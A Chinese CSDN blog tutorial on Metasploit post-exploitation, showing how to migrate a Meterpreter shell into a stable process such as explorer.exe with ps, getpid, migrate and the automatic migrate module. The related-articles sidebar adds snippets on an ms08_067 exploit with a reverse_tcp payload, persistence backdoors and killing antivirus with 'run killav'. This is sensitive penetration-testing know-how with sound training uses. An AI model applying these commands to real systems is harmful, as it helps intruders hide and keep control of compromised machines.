35. Metasploit后渗透攻击:Meterpreter进程迁移

最新推荐文章于 2024-04-22 20:30:55 发布
最新推荐文章于 2024-04-22 20:30:55 发布
阅读量3.9k 收藏 11
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023693/article/details/104925099
版权
1. Meterpreter优势:
  • a. 纯内存工作模式,不需要对磁盘进行任何写入操作;
  • b. 使用加密通信协议,而且可以同时与几个信道通信;
  • c. 在被攻击进程内工作,不需要创建新的进程;
  • d. 易于在多进程之间迁移;
  • e. 平台通用,适用于Windows、Linux、BSD系统,并支持Intel x86和Intel x64平台
2.Meterpreter进程迁移

在刚获得的Meterpreter Shell时,该shell极其脆弱和易受攻击的,所以获得此shell的第一步就是将其迁移,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。迁移过程如下:

1.输入ps 获取目标主机正在运行的进程在这里插入图片描述
2.输入getpid命令查看Meterpreter Shell的进程

在这里插入图片描述

3.输入migrate 1416 将shell进程迁移到explorer.exe进程里(迁移进程选择稳定进程)

在这里插入图片描述
注:自动迁移进程命令:run post/windows/manage/migrate
在这里插入图片描述

4.输入getpid查看当前PID,发现变为1416

在这里插入图片描述

5.进程迁移完后,原先PID为236的进行会自动关闭,如未关闭可以输入kill 236 杀掉进程
__Qian
关注
  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
squitch p.u.r.e.:纯渗透测试分布-开源
05-07
基础:Ubuntu服务器内核:3.2.6桌面:Gnome 2工具:愤怒的IP扫描程序etherape nmap wireshk快速通道metasploit 4.2.5
网络攻击与防御-第四章 Metasploit渗透攻击.pptx
06-29
"Metasploit渗透攻击" 本篇资源主要讲解了Metasploit渗透攻击的概念、原理和实践操作。Metasploit是全球最受欢迎的渗透测试工具,不仅因为其方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,...
Metasploit技术(四)——进程迁移
Phantom03167的博客
04-11 4891
渗透攻击 进程迁移
1.1 Metasploit 工具简介
CSDN
08-28 4134
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
windows本地提权--AT&SC&PS命令&进程迁移注入
最新发布
金灰的博客
04-22 501
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等......本地--->system。
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5604
meterpreter使用攻略(持续更新中)
渗透测试笔记】之【内网渗透——CS权限维持:CS上线后进程迁移插件】
AA8j的博客
10-25 2815
1. 服务端加载malleable配置文件 1.1 下载 下载地址:https://github.com/threatexpress/malleable-c2 下载cs对应版本配置文件: 我这里下载4.3版本的。 1.2 加载配置文件 下载完后放入CS根目录: 加载配置文件启动方式,只需要在末尾跟上配置文件就可以了: ./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile 2. 客户端加载cna插件 2.1 插件下载 下载地址:https://git
【kali-漏洞利用】(3.3)后渗透Meterpreter(上):命令大全
08-06 3809
【kali-漏洞利用】Meterpreter渗透
Metasploit进程迁移
qq_41453632的博客
12-02 6712
进程迁移:    在刚获得Meterpreter shell时,该shell是及其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动这个shell,把他和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。这样做使得渗透更难被检测到。 输入  ps 命令 (获取目标机正在运行的进程) 输入 getpid 命令...
Metasploit渗透测试指南(全) .pdf
12-23
此外,书中的高级话题可能涵盖Meterpreter,这是Metasploit中最强大的后渗透工具之一。Meterpreter提供了一个交互式的shell,允许攻击者在目标系统上执行命令、窃取数据、记录键盘输入等。读者将学习如何充分利用...
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
在分析各类攻击分类的基础上, 对MetaSploit攻击平台进行研究,实现如何利用漏洞,如何进行攻击、如何编写攻击代码payload,如何编写shellcode等。 详细介绍参考:...
内网之一次失败的域渗透
shy的博客
10-09 367
VMnet1 52(内网) VMnet2 72 (公网) Kali: 192.168.72.129 Win7:192.168.72.128 攻击机: Web渗透: 扫描端口:开启了80和3306端口 测试3306禁止远程登陆 访问80端口 扫描目录 访问http://192.168.72.128/yxcms 扫描目录 百度找到后台地址http://192.168.72.128/yxcms//index.php?r=admin/index/login ..
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8372
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
metasploit对IE进行渗透之高级选项及自动迁移进程
天元喜羊羊的博客
05-12 4498
root@bt:~# msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN N
metasploit迁移进程
天元喜羊羊的博客
04-27 3324
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Msf 进程迁移和自动化迁移指定进程
dongxieaitonglao的博客
03-17 1704
meterpreter作为一个进程时容易被清除,如果将它和系统经常运行的进程进行绑定,就能够实现持久化 1.进程迁移Meterpreter下输入ps(获取目标机正在运行的进程,记住目标进程的pid xxxx) 输入getpid命令(查看meterpreter shell的pid调到XXXX里相对稳定应用的进程里) 输入migrate xxxx (将meterpreter shell的pid调到xxxx里相对稳定应用的进程里) 最后用getid再次查看下是否更换成公 2.上线后自动化迁移指定进程 在se
渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 9018
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2297
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
metasploit渗透入门--meterpreter
Yale的博客
01-14 3219
0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ chmod...
metasploit渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞、攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客在未来再次访问受害者系统而不被发现。使用Metasploit创建后门非常简单,只需要执行以下步骤: 1. 使用Metasploit的exploit模块攻击目标系统,获取系统权限。 2. 利用Metasploit的post模块创建后门,例如使用“post/windows/manage/migrate”模块将后门进程迁移到其他进程中。 3. 确保后门能够在系统启动时自动运行,例如使用“run persistence”命令创建持久化后门。 4. 隐藏后门进程,例如使用“run killav”命令杀死杀毒软件进程,以免被杀毒软件发现。 5. 等待受害者再次连接后门并获取系统权限。 注意:上述操作仅用于合法的渗透测试和安全审计,任何未经授权的攻击行为都是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值